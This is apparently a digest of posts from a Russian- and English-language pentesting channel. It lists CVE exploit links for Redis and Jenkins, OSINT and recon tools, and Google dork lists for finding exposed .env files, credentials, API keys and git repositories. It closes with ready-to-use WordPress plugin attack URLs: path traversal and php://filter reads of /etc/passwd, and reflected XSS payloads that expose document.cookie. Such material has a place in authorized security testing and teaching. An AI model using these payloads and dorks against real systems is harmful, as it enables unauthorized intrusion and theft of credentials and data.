CVE-2022-24834 Redis
*
Затронуто:
7.0.0 ≤ version < 7.0.12
6.2.0 ≤ version < 6.2.13
2.6.0 ≤ version < 6.0.20
*
Большой разбор + PoC exploit RCE
*
VideoPOC

#redis #rce

150+ хакерских поисковых систем и инструментов.

•  На хабре была опубликована крутая подборка различных инструментов, которые должны быть в арсенале каждого специалиста в области информационной безопасности и пентестера.

•  Подборка разбита на категории и включает в себя следующие пункты:

• Метапоисковики и поисковые комбайны;
• Инструменты для работы с дорками;
• Поиск по электронной почте и логинам;
• Поиск по номерам телефонов;
• Поиск в сети #TOR;
• Поиск по интернету вещей, IP, доменам и поддоменам;
• Поиск данных об уязвимостях и индикаторов компрометации;
• Поиск по исходному коду.

Список инструментов доступен по ссылке: https://habr.com/ru/post/688972/

#ИБ #Пентест

ReconSpider by HTB

wget -O ReconSpider.zip https://academy.hackthebox.com/storage/modules/144/ReconSpider.v1.2.zip
unzip ReconSpider.zip
python3 ReconSpider.py https://example.com

#Recon

10 Essential OSINT CTF Challenges for Every Investigator:

Sakura Room
OhSINT Room
Web OSINT Room
Shodan Room
Las Vegas Challenge
OSINT Dojo Resources
Trace Labs’ Search Party
Geolocating Images Room
Google Dorking Room
S.O.ME.SINT Room

https://medium.com/@ninamaelainine/10-essential-osint-ctf-challenges-for-every-investigator-c573d75dc4cd

#BlueTeam #Incident #Handling

Top 10 Shodan Dorks

🔖#infosec #cybersecurity #hacking #pentesting #security

⚡️ 6000+ Private Nuclei Templates ⚡️

#BugBounty #Nuclei_Templates

#IDAPro #Reverse_Engineering

CVE Hunting Made Easy

https://projectblack.io/blog/cve-hunting-at-scale/

Useful Google Dorks that bug bounty hunters can leverage to find sensitive information: 👇🏻

1. Discovering Exposed Files:
   - intitle:"index of" "site:target.com"
   - filetype:log inurl:log site:target.com
   - filetype:sql inurl:sql site:target.com
   - filetype:env inurl:.env site:target.com

2. Finding Sensitive Directories:
   - inurl:/phpinfo.php site:target.com
   - inurl:/admin site:target.com
   - inurl:/backup site:target.com
   - inurl:wp- site:target.com

3. Exposed Configuration Files:
   - filetype:config inurl:config site:target.com
   - filetype:ini inurl:wp-config.php site:target.com
   - filetype:json inurl:credentials site:target.com

4. Discovering Usernames and Passwords:
   - intext:"password" filetype:log site:target.com
   - intext:"username" filetype:log site:target.com
   - filetype:sql "password" site:target.com

5. Finding Database Files:
   - filetype:sql inurl:db site:target.com
   - filetype:sql inurl:dump site:target.com
   - filetype:bak inurl:db site:target.com

6. Exposed Git Repositories:
   - inurl:".git" site:target.com
   - inurl:"/.git/config" site:target.com
   - intitle:"index of" ".git" site:target.com

7. Finding Publicly Exposed Emails:
   - intext:"email" site:target.com
   - inurl:"contact" intext:"@target.com" -www.target.com
   - filetype:xls inurl:"email" site:target.com

8. Discovering Vulnerable Web Servers:
   - intitle:"Apache2 Ubuntu Default Page: It works" site:target.com
   - intitle:"Index of /" "Apache Server" site:target.com
   - intitle:"Welcome to nginx" site:target.com

9. Finding API Keys:
   - filetype:env "DB_PASSWORD" site:target.com
   - intext:"api_key" filetype:env site:target.com
   - intext:"AWS_ACCESS_KEY_ID" filetype:env site:target.com

10. Exposed Backup Files:
    - filetype:bak inurl:backup site:target.com
    - filetype:bak inurl:backup site:target.com
    - filetype:zip inurl:backup site:target.com
    - filetype:tgz inurl:backup site:target.com

Replace target.com with the domain or target you are focusing on.

#GoogleDorks
#BugHunting
#OSINT

#sqlmap #CheatSheet #By_HTB

sploitify.haxx.it

Curated list of public server-side exploits. Search by keyword, filter by vulnerability type, service affected and OS. Detailed description for each exploit (with PoC, Nuclei template or Metasploit module).

Deep Dive into Discord: OSINT Techniques (by Nina Maelainine)

- Discord Server Directories
- Bot Directories and Resources
- Specialized Tools

https://medium.com/@ninamaelainine/deep-dive-into-discord-osint-techniques-00534bf69371

#osint #socmint

https://github.com/stamparm/identYwaf

#WAF #Bypass #Tool

CVE-2024-43044 Jenkins
*
WriteUP
*
POC exploit

#jenkins

Прекрасное в мире плагинов WordPress
*
simple-image-manipulator

/wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd

activehelper-livehelp

/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&

amministrazione-aperta

/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd

anti-plagiarism

/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

buddypress-component-stats

/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd

dzs-videogallery

/wp-content/plugins/dzs-videogallery/admin/upload.php

e-search

/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E

fancy-product-designer

/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php

hd-webplayer

/wp-content/plugins/hd-webplayer/playlist.php

localize-my-post

/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd